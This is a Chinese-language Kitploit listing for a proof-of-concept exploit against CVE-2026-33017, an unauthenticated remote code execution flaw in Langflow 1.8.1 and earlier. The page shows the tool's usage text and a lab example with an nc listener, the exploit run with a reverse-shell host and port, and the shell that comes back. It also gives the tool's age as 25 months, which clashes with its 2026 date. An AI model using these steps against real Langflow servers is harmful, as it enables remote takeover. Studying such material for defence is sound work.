Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2026-33017 — 针对 CVE-2026-33017(Langflow <= 1.8.1)的概念验证漏洞利用程序。 | Kitploit
工具/GitHubGitHub/masterwok/poc-cve-2026-33017
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubmasterwok/poc-cve-2026-33017

PoC-CVE-2026-33017

针对 CVE-2026-33017(Langflow <= 1.8.1)的概念验证漏洞利用程序。

查看仓库
25个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC:CVE-2026-33017

Langflow <= 1.8.1 存在一个远程、未认证的 RCE 漏洞(https://nvd.nist.gov/vuln/detail/CVE-2026-33017)


使用方法

root@kitploit:~
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target

PoC exploit: CVE-2026-33017

positional arguments:
  target         Target hostname

options:
  -h, --help     show this help message and exit
  --lhost LHOST  Reverse shell destination IP address
  --lport LPORT  Reverse shell destination port

示例

root@kitploit:~
# 创建 docker 实例
docker run -d -p 7860:7860 langflowai/langflow:1.8.1

# 启动监听器
nc -lnvp 4444

# 启动漏洞利用
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444

# 应在监听器中收到反弹 shell
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux

本项目仅供教育和研究目的使用。 作者不对因使用此代码造成的滥用或损害负责。

下载工具